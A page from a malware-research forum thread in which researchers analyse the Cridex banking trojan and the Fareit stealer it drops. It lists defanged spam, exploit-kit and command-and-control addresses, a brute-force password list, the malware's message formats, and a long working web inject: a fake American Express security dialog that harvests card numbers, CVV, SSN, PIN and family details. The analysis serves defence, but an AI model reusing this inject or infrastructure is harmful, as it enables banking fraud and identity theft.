WinNT/Cridex (alias Dridex, Drixed)

150 posts
Page 5 of 15
Jump to page #

150 posts

Re: Worm:Win32/Cridex

#17211 by unixfreaxjp
Sun Dec 16, 2012 7:46 am

To EP_X0FF, nice crypted PE cracks! Will you please blog the details of reversing it?
At the time I saw the crypted packed I just skipped it to save times... (got only weekend for this)
I thought only @Xylit0l in this planet that can reverse it ;P < Steve you're so busy these days is it?
PS: I went straight to play with this stuff and post it in MalwareMustDie blog mentioning kernelmode & you guys!
#MalwareMustDie! You guys rocks!!!

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Re: Worm:Win32/Cridex

#17214 by EP_X0FF
Sun Dec 16, 2012 4:11 pm

unixfreaxjp wrote:To EP_X0FF, nice crypted PE cracks! Will you please blog the details of reversing it?

Sorry no. Never understood all this descriptions of decryption/unpacking in the AV articles. It is very boring process if manual.

Specifically to Fareit - set breaks on memory alloc, trace a little when it will be called with ERW protection. Dump this region when it filled with decrypted payload. Cut off garbage and rebuild resulting PE. Done.

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: Worm:Win32/Cridex

#17351 by unixfreaxjp
Sat Dec 22, 2012 7:48 pm

The set of Trojan Parfeit Infection Distributed via Cridex using BHEK 2.1 Plugindetect 0.7.9

Summary:

Spam URL: h00p://www.irwra.com/wp-content/themes/mantra/ ... inform.htm (50.116.98.44)
Landing URL: h00p://latticesoft.net/detects/continues-little.php (59.57.247.185)
BHEK PluginDetect: http://pastebin.com/uK3GbqKb
BHEK Payload Crack Guide/MyNote: http://pastebin.com/raw.php?i=pgHiFawi
Cridex Payload: h00p://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d
Cridex VT: https://www.virustotal.com/file/d18b309 ... /analysis/

Cridex Callback:

h00p://94.73.129.120:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.120.226.30:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.40.109.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://204.15.30.202:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://59.90.221.6:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://69.64.89.82:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://78.28.120.32:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://74.117.107.25:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://174.142.68.239:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://23.29.73.220:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://81.93.250.157:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.212.156.170:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://173.203.102.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://84.22.100.108:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
*) With all Proxy's Port/Server: 8080 / nginx/1.0.10
*) Downloading Parfeit...

Parfeit VT:

https://www.virustotal.com/file/f8f7205 ... /analysis/

Parfeit Callback URLs:

h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php

Credential CNC Server Info:

// Credentials sent CnC panel
var adminPanelLocation ='h00p://62.76.177.51/if_Career/';
//Data Modify Process:
h00p://62.76.177.123/mx/2B/in/cp.php?h=8
// Phishing Credentials urls
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica

Brute Password in Parfeit bins:

Code: Select all

phpbb      john316      pass        slayer    
qwerty     richard      aaaaaa      wisdom    
jesus      blink182     amanda      praise    
abc123     peaches      nothing     zxcvbnm   
letmein    cool         ginger      samuel    
test       flower       mother      mike      
love       scooter      snoopy      dallas    
password1  banana       jessica     green     
hello      james        welcome     testtest  
monkey     asdfasdf     pokemon     maverick  
dragon     victory      iloveyou1   onelove   
trustno1   london       mustang     david     
iloveyou   123qwe       helpme      mylove    
shadow     startrek     justin      church    
christ     george       jasmine     friend    
sunshine   winner       orange      god       
master     maggie       testing     destiny   
computer   trinity      apple       none      
princess   online       michelle    microsoft 
tigger     123abc       peace       bubbles   
football   chicken      secret      cocacola  
angel      junior       grace       jordan23  
jesus1     chris        william     ilovegod  
whatever   passw0rd     iloveyou2   football1 
freedom    austin       nicole      loving    
killer     sparky       muffin      nathan    
asdf       admin        gateway     emmanuel  
soccer     merlin       fuckyou1    scooby    
superman   google       asshole     fuckoff   
michael    friends      hahaha      sammy     
cheese     hope         poop        maxwell   
internet   shalom       blessing    jason     
joshua     nintendo     blahblah    john      
fuckyou    looking      myspace1    1q2w3e4r  
blessed    harley       matthew     baby      
baseball   smokey       canada      red123    
starwars   joseph       silver      blabla    
purple     lucky        robert      prince    
jordan     digital      forever     qwert     
faith      thunder      asdfgh      chelsea   
summer     spirit       rachel      angel1    
ashley     bandit       rainbow     hardcore  
buster     enter        guitar      dexter    
heaven     anthony      peanut      saved     
pepper     corvette     batman      hallo     
hunter     hockey       cookie      jasper    
lovely     power        bailey      danielle  
andrew     benjamin     soccer1     kitten    
thomas     iloveyou!    mickey      cassie    
angels     1q2w3e       biteme      stella    
charlie    viper        hello1      prayer    
daniel     genesis      eminem      hotdog    
jennifer   knight       dakota      windows   
single     qwerty1      samantha    mustdie   
hannah     creative     compaq      gates     
qazwsx     foobar       diamond     billgates 
happy      adidas       taylor      ghbdtn    
matrix     rotimi       forum       gfhjkm   hgTYDOMium

Additionals:

Parfeit config: http://pastebin.com/raw.php?i=20L5BEwK
All Sample download: http://www.mediafire.com/?c2zbavk59g60ok4
Overall report + Screenshots + Analysis data download: http://malwaremustdie.blogspot.jp/2012/ ... rfeit.html

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Re: Worm:Win32/Cridex

#17740 by unixfreaxjp
Thu Jan 17, 2013 6:35 pm

The latest set of Trojan Fareit Infection Distributed via Trojan Cridex using BHEK 2.1 Plugindetect 0.7.9

Summary:
Spam URL: h00p://kompot.designcon.tmweb.ru/upload.htm (176.57.216.3)
Or this: h00p://www.piastraollare.com/upload.htm
Landing URL: h00p://dozakialko.ru:8080/forum/links/column.php
(212.112.207.15, 89.111.176.125, 91.224.135.20)
BHEK PluginDetect: http://pastebin.com/50Usb5TE
BHEK Payload Crack Guide/MyNote: http://malwaremustdie.blogspot.jp/p/81.html
↑ different domain, same actors
Cridex Payload:

Code: Select all

h00p://dozakialko.ru:8080/forum/links/column.php?qf=30:1n:1i:1i:33&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&y=1k&wf=x&xt=t

Cridex VT: https://www.virustotal.com/file/ceff348 ... /analysis/
Fareit VT: https://www.virustotal.com/file/cdbc248 ... /analysis/

Cridex Callback
Method: HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

To:

Code: Select all

h00p://84.22.100.108:8080
h00p://182.237.17.180:8080
h00p://221.143.48.6:8080
h00p://180.235.150.72:8080
h00p://64.76.19.236:8080
h00p://163.23.107.65:8080
h00p://59.90.221.6:8080
h00p://210.56.23.100:8080
h00p://173.201.177.77:8080
h00p://203.217.147.52:8080
h00p://74.207.237.170:8080
h00p://97.74.113.229:8080
h00p://193.68.82.68:8080
h00p://69.64.89.82:8080
h00p://77.58.193.43:8080
h00p://174.120.86.115:8080
h00p://94.20.30.91:8080
h00p://174.142.68.239:8080
h00p://87.229.26.138:8080
h00p://188.120.226.30:8080
h00p://78.28.120.32:8080
h00p://217.65.100.41:8080
h00p://81.93.250.157:8080
h00p://95.142.167.193:8080
h00p://109.230.229.250:8080
h00p://109.230.229.70:8080

Server's stamps:

Code: Select all

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 16:17:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding

User-Agent Used by Cridex:

Code: Select all

"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"

Textual (Botnet?) Commands Sent Via Post to motherships:

Code: Select all

Connection
modify
pattern
replacement
httpinject
conditions
actions
redirect
process

MSG/Protocol Formats:

Code: Select all

// The sent time, user-agent via HTTP
＜http time="%%%uu"＞
＜url＞＜![CDATA[%%.%us]]＞＜/url＞
＜useragent＞＜![CDATA[%%.%us]]＞＜/useragent＞
＜data＞＜![CDATA[]]＞＜/data＞
＜/http＞
 
// Current time sent with url and data
＜httpshot time="%%%uu"＞
＜url＞＜![CDATA[%%.%us]]＞＜/url＞
＜data＞＜![CDATA[]]＞＜/data＞
＜/httpshot＞
 
// FTP data...
＜ftp time="%%%uu"＞
＜server＞＜![CDATA[%%u.%%u.%%u.%%u:%%u]]＞＜/server＞
＜user＞＜![CDATA[%%.%us]]＞＜/user＞
＜pass＞＜![CDATA[]]＞＜/pass＞
＜/ftp＞
 
// Mail POP3 data..
＜pop3 time="%%%uu"＞＜server＞＜![CDATA[%%u.%%u.%%u.%%u:%%u]]＞＜/server＞
＜user＞＜![CDATA[%%.%us]]＞＜/user＞＜pass＞＜![CDATA[]]＞＜/pass＞
＜/pop3＞
 
// Command lines...
＜cmd id="%u"＞%u＜/cmd＞
 
// Certification information...
＜cert time="%u"＞
＜pass＞＜![CDATA[]]＞＜/pass＞
＜data＞＜![CDATA[]]＞＜/data＞
＜/cert＞
 
// Internet explorer information
＜ie time="%u"＞
＜data＞＜![CDATA[]]＞＜/data＞
＜/ie＞
 
// Case of firefox....
＜ff time="%u"＞
＜data＞
＜![CDATA[]]＞
＜/data＞
＜/ff＞
 
// Case of "mm" = Macromedia?
＜mm time="%u"＞
＜data＞＜![CDATA[]]＞＜/data＞
＜/mm＞
 
// Hashed message contains PC privacy info...
＜message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u"＞
＜header＞
＜unique＞%%.%us＜/unique＞
＜version＞%%u＜/version＞
＜system＞%%u＜/system＞
＜network＞%%u＜/network＞
＜/header＞
＜data＞
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
＜/data＞
＜/message＞

Crypto Method:

Code: Select all

CryptImportPublicKeyInfo
CryptDecodeObjectEx
CryptStringToBinaryA
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertCloseStore
PFXExportCertStoreEx
CertOpenSystemStoreW
PFXImportCertStore

Fareit Config files snipped:

Code: Select all

"cash & wires accounts"
 
 ＜settings hash="e0014db74a7606d107a0b61e31f0d159334877e8"＞
 ＜httpshots＞＜url type="deny"＞\.(css|js)($|\?)＜/url＞
 ＜url contentType="^text/(html|plain)"＞\.com/k1/＜/url＞
 ＜url contentType="^text/(html|plain)"＞/ach/＜/url＞
 ＜url contentType="^text/(html|plain)"＞/authentication/zbf/k/＜/url＞
 ＜url contentType="^text/(html|plain)"＞/bb/logon/＜/url＞
 ＜url contentType="^text/(html|plain)"＞chase\.com＜/url＞
 ＜url contentType="^text/(html|plain)"＞/cashman/＜/url＞
 ＜url contentType="^text/(html|plain)"＞/cashplus/＜/url＞
    :
"SNS Accounts.."
 
 ＜formgrabber＞
   ＜url type="deny"＞\.(swf)($|\?)＜/url＞
   ＜url type="deny"＞/isapi/ocget.dll＜/url＞
   ＜url type="allow"＞^hｔｔps?://aol・com/.*/login/＜/url＞
   ＜url type="allow"＞^hｔｔps?://accounts.google・com/ServiceLogin＜/url＞
   ＜url type="allow"＞^hｔｔps?://login.yahoo・com/＜/url＞
   ＜url type="allow"＞^hｔｔps?://login.live・com/＜/url＞
   ＜url type="deny"＞^hｔｔps?://(\w+\.)?aol・com＜/url＞
   ＜url type="deny"＞^hｔｔps?://(\w+\.)?facebook・com/＜/url＞ 
       :
ORIGINAL CODE:
 <settings hash="e0014db74a7606d107a0b61e31f0d159334877e8"><httpshots><url type="deny">\.(css|js)($|\?)</url><url contentType="^text/(html|plain)">\.com/k1/</url><url contentType="^text/(html|plain)">/ach/</url><url contentType="^text/(html|plain)">/authentication/zbf/k/</url><url contentType="^text/(html|plain)">/bb/logon/</url><url 
    : (snipped)
<div id="namefr" style="display:none;" >
 <iframe width="50" height="50" id="myfx"  name="myfx"></iframe>
 </div>
 <link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
 <style type="text/css">
 .ui-dialog-titlebar
 {
   background: white
 }
 .text1a
 {
   font-family: Arial;
   font-size: 10px;
 }
 .sunclass
 {
   border-bottom-color: #cccccc;
   border-bottom-style: solid;
   border-bottom-width: 1px;
   border-collapse: collapse;
   background-color: #f5f6f1;
   color: #333333;
   margin-right:10px;
   margin-left:10px;
   text-align: center;
 }
 </style>
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
 <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
 <div id="msg"   style=" display:none; height:60px;" class=sunclass>
 <div id="box"    class=sunclass  style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;padding-top:20px;padding-bottom:20px;">
 <font id="err" style="font-weight:700;font-family: Arial;font-size: 12px;">The <span id="ername">Passcode</span> you entered does not match our records. Please verify and make sure you re-enter your <span id="ername1"> passcode </span>&nbsp correctly.</font>
 </div>
 </div>
 <div id="dialog"   style=" display:none; height:180px; width:350px;padding:0; margin0;">
 <div id="txt1"  class=sunclass  style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
 </div>
 <div id="txt2"   class=sunclass>
 <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please enter the information below to continue:</font>
 </div>
 <form action="https://secure.americanexpress.com/NextGenNavigation/img/logo_bluebox.gif" id="test" method="post" target="myfx" >
 <!--CC-->
 <div id="full_cc"  class=sunclass style="height:30px ;text-align: left;">
 <table>
 <tr>
 <td>
 <div id="div_cc_text" style="padding:1px; padding-top:3px; width:72px ; height:25px;text-align:left;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">Card number:</font>
 </div>
 </td>
 <td>
 <div id="div_cc" style ="padding:1px;">
 <input type="text" class="amountfield"  id="cc1" style="text-align:right;width:34px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; width=46px;" name="cc1"  onkeyup="tabNext1CC(this);"   maxlength=4 >
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
 <input type="text" class="amountfield"  id="cc2"style="text-align:right; width:42px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; " name="cc2"   onkeyup="tabNext2CC(this);"  maxlength=6 >
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
 <input type="text" class="amountfield"  id="cc3" style="text-align:right;width:38px; height:12px;  font-weight:700;font-family: Arial;font-size: 10px;" name="cc3"   maxlength=5 >
 </div>
 </td>
 </tr>
 </table>
 </div>
 <!--EXP-->
 <div id="fulll_exp"  class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_exp" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">Exp.date:</font>
 </div>
 </td>
 <td><div id="div_exp" style ="padding:1px;">
 <input type="text"  class="amountfield"   id="exp_mm" style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_mm"    maxlength=2 >
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">/</font>
 <input type="text"  class="amountfield"  id="exp_yy"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_yy"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--CVV-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_cvv" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">CVV Code:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;"><input type="text"   id="cvv" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cvv"    maxlength=4 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/312/ac62dbbce67681a33d23490607f59cf6')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
 </tr>
 </table>
 </div>
 <!--3 digit code-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_3digitcode" style="padding:1px; padding-top:7px; width:172px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">3-Digit Code on the back of card:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;"><input type="text"   id="3digitcode" style="text-align:right;width:33px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="3digitcode" method="post"   maxlength=3 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/273/58be12e2c069fcc7b20ebb2a11921f98')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
 </tr>
 </table>
 </div>
 <!--SSN-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_ssn" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Social Security Number:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text" class="amountfield"   id="ssn_1" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_1"     maxlength=3 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text"  class="amountfield"   id="ssn_2" style="width:38px; height14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_2"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="ssn_3" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_3"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--Personal security PIN-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_ps_pin" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Personal security PIN:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text" class="amountfield"   id="ps_pin" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ps_pin"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--MMN-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother's Maiden Name:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text" class="amountfield"    id="exp_mm" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="mmn"   >
 </div></td>
 </tr>
 </table>
 </div>
 <!--POB-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Place of birth:</font></td></div>
 <td><div id="div_pob" style =" padding:1px;">
 <input type="text" class="amountfield"    id="pob" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="pob"   >
 </div></td>
 </tr>
 </table>
 </div>
 <!--DOB-->
 <div id="txt2"  class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Date of birth:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text"  class="amountfield"  id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_mm"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_dd"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_yy"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--MDOB-->
 <div id="txt2"  class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother Date of birth:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text"  class="amountfield"  id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_mm"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_dd"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_yy"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <div id="txt2" class=sunclass style="height: 20px; padding:3px ;padding-right:15px;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right"><input type="image" onclick="return formmySubmit();"   align="right" src="/myca/shared/summary/asr/images/lnf/btn_continue.gif"  value="Verify"  title="Continue"/></div></font>
 </div>
 </form>
 </div>
 <script type="text/javascript">
 function tabNext1CC(elem) {
   if(elem.value.length == 4) {
     document.getElementById('cc2').focus();
   }
 }
 function tabNext2CC(elem) {
   if(elem.value.length == 6) {
     document.getElementById('cc3').focus();
   }
 }
 function formmySubmit() {
   $("#msg").css("background", "#f5f6f1");
   if (checkCC()) {
     $("#div_cc_text").css("color", "black");
     if (checkExp()) {
       $("#div_exp").css("color", "black");
       if (checkCVV()) {
         $("#div_cvv").css("color", "black");
         if (check3DigitCode()) {
           $("#div_3digitcode").css("color", "black");
           if (SSN_check() == true) {
             $("#div_ssn").css("color", "black");
             if (PS_PIN_check() == true) {
               $("#div_ps_pin").css("color", "black");
               if (POB_check() == true) {
                 $("#div_pob").css("color", "black");
                 if (checkDob() == true) {
                   $("#div_dob").css("color", "black");
                   $("#div_mdob").css("color", "black");
                   $.cookie("trusted_rapport", "1", {
                     expires: 10,
                     path: "/",
                     domain: ".americanexpress.com"
                   });
                   $("#dialog").dialog("close");
                   return true
                 } else {
                   $("#div_dob").css("color", "red");
                   $("#div_mdob").css("color", "red");
                   doError("Date of birth")
                 }
               } else {
                 $("#div_pob").css("color", "red");
                 doError("place of birth")
               }
             } else {
               $("#div_ps_pin").css("color", "red");
               doError("personal security PIN")
             }
           } else {
             $("#div_ssn").css("color", "red");
             doError("social security number")
           }
         } else {
           $("#div_3digitcode").css("color", "red");
           doError("3-digit code")
         }
       } else {
         $("#div_cvv").css("color", "red");
         doError("cvv code")
       }
     } else {
       $("#div_exp").css("color", "red");
       doError("expiration date")
     }
   } else {
     $("#div_cc_text").css("color", "red");
     doError("card number")
   }
 }
 function out() {
   document.body.removeChild(img)
 }
 function move(a) {
   a = a || window.event;
   if (a.pageX == null && a.clientX != null) {
     var b = document.documentElement;
     var c = document.body;
     a.pageX = a.clientX + (b && b.scrollLeft || c && c.scrollLeft || 0) - (b.clientLeft || 0);
     a.pageY = a.clientY + (b && b.scrollTop || c && c.scrollTop || 0) - (b.clientTop || 0)
   }
   img.style.left = a.pageX + 15 + "px";
   img.style.top = a.pageY + 15 + "px"
 }
 function over(a) {
   img = document.createElement("div");
   document.body.appendChild(img);
   img.innerHTML = "<img src=" + a + " />";
   img.style.zIndex = "111111111111";
   img.style.position = "absolute";
   img.style.background = "#FFFFFF";
   img.style.border = "solid 1px #346fdc";
   img.style.padding = "4px";
   move();
 }
 function SSN_check() {
   var a = $("#ssn_1").val();
   var b = $("#ssn_2").val();
   var c = $("#ssn_3").val();
   var d = a.length + b.length + c.length;
   if (d == 9)
   if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
   return true;
   return false
 }
 function PS_PIN_check() {
   var a = $("#ps_pin").val();
   var d = a.length;
   if (d == 4)
   //if (isNaN(a) == false) // uncomment if pin is digital only
   return true;
   return false
 }
 function POB_check() {
   var a = $("#pob").val();
   var d = a.length;
   if (d > 0) {
     return true;
   }
   else {
     return true;
   }
 }
 function check3DigitCode() {
   var a = $("#3digitcode").val();
   var b = a.length;
   if (isNaN(a) == false)
   if (b == 3)
   return true;
   return false
 }
 function checkCVV() {
   var a = $("#cvv").val();
   var b = a.length;
   if (isNaN(a) == false)
   if (b == 4)
   return true;
   return false
 }
 function checkExp() {
   var a = $("#exp_mm").val();
   var b = $("#exp_yy").val();
   var c = a.length + b.length;
   if (c > 5)
   if (a > 0 && a < 13)
   if (b > 2009 && b < 2030)
   return true;
   return false
 }
 function checkCC() {
   var a = $("#cc1").val();
   var b = $("#cc2").val();
   var c = $("#cc3").val();
   if (check_cc(a+b+c) && a.charAt(0) == "3")
   return true;
   return false
 }
 function checkDob() {
   var a = $("#dob_mm").val();
   var b = $("#dob_dd").val();
   var c = $("#dob_yy").val();
   var d = $("#mdob_mm").val();
   var e = $("#mdob_dd").val();
   var f = $("#mdob_yy").val();
   var g = a.length + b.length + c.length;
   var h = d.length + e.length + f.length;
   if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
   if (g > 6)
   if (c < 1995 && c > 1900)
   if (a > 0 && a < 13 && b > 0 && b < 32)
   if ((isNaN(d) || isNaN(e) || isNaN(f)) == false)
   if (h > 6)
   if (d > 0 && d < 13 && e > 0 && e < 32)
   if (f + 12 < c)
   return true;
   return false
 }
 function doError(a) {
   $("#ername").text(a);
   $("#ername1").text(a);
   $("#msg").dialog({
     closeOnEscape: false,
     resizable: false,
     modal: true,
     width: 350,
     modal: true,
     zIndex: 99999
   })
 }
 function formClose() {
   $("#msg").dialog("close");
   return true
 }
 function check_cc(cardnumber) {
   var cardNo = cardnumber.replace(/[^0-9]/g, "");
   if (cardNo.length < 15 || cardNo.length > 16) {
     return false;
   }
   var checksum = 0;
   var j = 1;
   var calc;
   for (i = cardNo.length - 1; i >= 0; i--) {
     calc = Number(cardNo.charAt(i)) * j;
     if (calc > 9) {
       checksum = checksum + 1;
       calc = calc - 10;
     }
     checksum = checksum + calc;
     if (j == 1) {
       j = 2;
     } else {
       j = 1;
     }
   }
   if (checksum % 10 != 0) {
     return false;
   }
   return true;
 }
 jQuery.cookie = function(a, b, c) {
   if (typeof b != "undefined") {
   c = c || {};
     if (b === null) {
       b = "";
       c.expires = -1
     }
     var d = "";
     if (c.expires && (typeof c.expires == "number" || c.expires.toUTCString)) {
       var e;
       if (typeof c.expires == "number") {
         e = new Date;
         e.setTime(e.getTime() + c.expires * 24 * 60 * 60 * 1e3)
       } else
       e = c.expires;
       d = "; expires=" + e.toUTCString()
     }
     var f = c.path ? "; path=" + c.path: "";
     var g = c.domain ? "; domain=" + c.domain: "";
     var h = c.secure ? "; secure": "";
